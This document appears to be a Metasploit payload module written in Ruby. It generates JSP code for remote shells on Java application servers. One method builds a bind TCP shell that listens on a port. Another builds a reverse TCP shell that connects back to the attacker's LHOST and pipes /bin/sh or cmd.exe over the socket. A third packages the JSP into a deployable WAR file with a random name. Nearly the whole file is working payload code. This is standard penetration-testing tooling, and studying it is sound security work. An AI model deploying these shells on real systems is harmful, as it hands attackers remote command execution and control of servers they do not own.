211 lines
5.6 KiB
Ruby
211 lines
5.6 KiB
Ruby
# -*- coding: binary -*-
|
|
require 'msf/core'
|
|
require 'rex'
|
|
|
|
# This module is chained within JSP payloads that target the Java platform.
|
|
# It provides methods to generate Java / JSP code.
|
|
module Msf::Payload::JSP
|
|
|
|
# @param [Hash<Symbol, [String, nil]>] info
|
|
def initialize(info = {})
|
|
ret = super(info)
|
|
|
|
register_options([
|
|
Msf::OptString.new( 'SHELL', [false, 'The system shell to use.'])
|
|
], Msf::Payload::JSP )
|
|
|
|
ret
|
|
end
|
|
|
|
# Outputs jsp that spawns a bind TCP shell
|
|
#
|
|
# @return [String] jsp code that executes bind TCP payload
|
|
def jsp_bind_tcp
|
|
# Modified from: http://www.security.org.sg/code/jspreverse.html
|
|
|
|
var_is = Rex::Text.rand_text_alpha_lower(2)
|
|
var_os = Rex::Text.rand_text_alpha_lower(2)
|
|
var_in = Rex::Text.rand_text_alpha_lower(2)
|
|
var_out = Rex::Text.rand_text_alpha_lower(3)
|
|
|
|
jsp = <<-EOS
|
|
<%@page import="java.lang.*"%>
|
|
<%@page import="java.util.*"%>
|
|
<%@page import="java.io.*"%>
|
|
<%@page import="java.net.*"%>
|
|
|
|
<%
|
|
class StreamConnector extends Thread
|
|
{
|
|
InputStream #{var_is};
|
|
OutputStream #{var_os};
|
|
|
|
StreamConnector( InputStream #{var_is}, OutputStream #{var_os} )
|
|
{
|
|
this.#{var_is} = #{var_is};
|
|
this.#{var_os} = #{var_os};
|
|
}
|
|
|
|
public void run()
|
|
{
|
|
BufferedReader #{var_in} = null;
|
|
BufferedWriter #{var_out} = null;
|
|
try
|
|
{
|
|
#{var_in} = new BufferedReader( new InputStreamReader( this.#{var_is} ) );
|
|
#{var_out} = new BufferedWriter( new OutputStreamWriter( this.#{var_os} ) );
|
|
char buffer[] = new char[8192];
|
|
int length;
|
|
while( ( length = #{var_in}.read( buffer, 0, buffer.length ) ) > 0 )
|
|
{
|
|
#{var_out}.write( buffer, 0, length );
|
|
#{var_out}.flush();
|
|
}
|
|
} catch( Exception e ){}
|
|
try
|
|
{
|
|
if( #{var_in} != null )
|
|
#{var_in}.close();
|
|
if( #{var_out} != null )
|
|
#{var_out}.close();
|
|
} catch( Exception e ){}
|
|
}
|
|
}
|
|
|
|
try
|
|
{
|
|
#{shell_path}
|
|
ServerSocket server_socket = new ServerSocket( #{datastore['LPORT'].to_s} );
|
|
Socket client_socket = server_socket.accept();
|
|
server_socket.close();
|
|
Process process = Runtime.getRuntime().exec( ShellPath );
|
|
( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
|
|
( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
|
|
} catch( Exception e ) {}
|
|
%>
|
|
EOS
|
|
|
|
jsp
|
|
end
|
|
|
|
# Outputs jsp code that spawns a reverse TCP shell
|
|
#
|
|
# @return [String] jsp code that executes reverse TCP payload
|
|
def jsp_reverse_tcp
|
|
# JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
|
|
|
|
var_is = Rex::Text.rand_text_alpha_lower(2)
|
|
var_os = Rex::Text.rand_text_alpha_lower(2)
|
|
var_in = Rex::Text.rand_text_alpha_lower(2)
|
|
var_out = Rex::Text.rand_text_alpha_lower(3)
|
|
|
|
jsp = <<-EOS
|
|
<%@page import="java.lang.*"%>
|
|
<%@page import="java.util.*"%>
|
|
<%@page import="java.io.*"%>
|
|
<%@page import="java.net.*"%>
|
|
|
|
<%
|
|
class StreamConnector extends Thread
|
|
{
|
|
InputStream #{var_is};
|
|
OutputStream #{var_os};
|
|
|
|
StreamConnector( InputStream #{var_is}, OutputStream #{var_os} )
|
|
{
|
|
this.#{var_is} = #{var_is};
|
|
this.#{var_os} = #{var_os};
|
|
}
|
|
|
|
public void run()
|
|
{
|
|
BufferedReader #{var_in} = null;
|
|
BufferedWriter #{var_out} = null;
|
|
try
|
|
{
|
|
#{var_in} = new BufferedReader( new InputStreamReader( this.#{var_is} ) );
|
|
#{var_out} = new BufferedWriter( new OutputStreamWriter( this.#{var_os} ) );
|
|
char buffer[] = new char[8192];
|
|
int length;
|
|
while( ( length = #{var_in}.read( buffer, 0, buffer.length ) ) > 0 )
|
|
{
|
|
#{var_out}.write( buffer, 0, length );
|
|
#{var_out}.flush();
|
|
}
|
|
} catch( Exception e ){}
|
|
try
|
|
{
|
|
if( #{var_in} != null )
|
|
#{var_in}.close();
|
|
if( #{var_out} != null )
|
|
#{var_out}.close();
|
|
} catch( Exception e ){}
|
|
}
|
|
}
|
|
|
|
try
|
|
{
|
|
#{shell_path}
|
|
Socket socket = new Socket( "#{datastore['LHOST']}", #{datastore['LPORT'].to_s} );
|
|
Process process = Runtime.getRuntime().exec( ShellPath );
|
|
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
|
|
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
|
|
} catch( Exception e ) {}
|
|
%>
|
|
EOS
|
|
|
|
jsp
|
|
end
|
|
|
|
# Wraps the jsp payload into a war
|
|
#
|
|
# @return [Rex::Zip::Jar] a war to execute the jsp payload
|
|
def generate_war
|
|
jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp"
|
|
|
|
zip = Rex::Zip::Jar.new
|
|
|
|
web_xml = <<-EOF
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE web-app PUBLIC
|
|
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
|
|
"http://java.sun.com/dtd/web-app_2_3.dtd">
|
|
<web-app>
|
|
<welcome-file-list>
|
|
<welcome-file>#{jsp_name}</welcome-file>
|
|
</welcome-file-list>
|
|
</web-app>
|
|
EOF
|
|
|
|
zip.add_file("WEB-INF/", '')
|
|
zip.add_file("WEB-INF/web.xml", web_xml)
|
|
zip.add_file(jsp_name, generate)
|
|
|
|
zip
|
|
end
|
|
|
|
# Outputs Java code to assign the system shell path to a variable.
|
|
#
|
|
# It uses the datastore if a value has been provided, otherwise
|
|
# tries to guess the system shell path bad on the os target.
|
|
#
|
|
# @return [String] the Java code.
|
|
def shell_path
|
|
if datastore['SHELL'] && !datastore['SHELL'].empty?
|
|
jsp = "String ShellPath = \"#{datastore['SHELL']}\";"
|
|
else
|
|
jsp = <<-EOS
|
|
String ShellPath;
|
|
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
|
|
ShellPath = new String("/bin/sh");
|
|
} else {
|
|
ShellPath = new String("cmd.exe");
|
|
}
|
|
EOS
|
|
end
|
|
|
|
jsp
|
|
end
|
|
|
|
end
|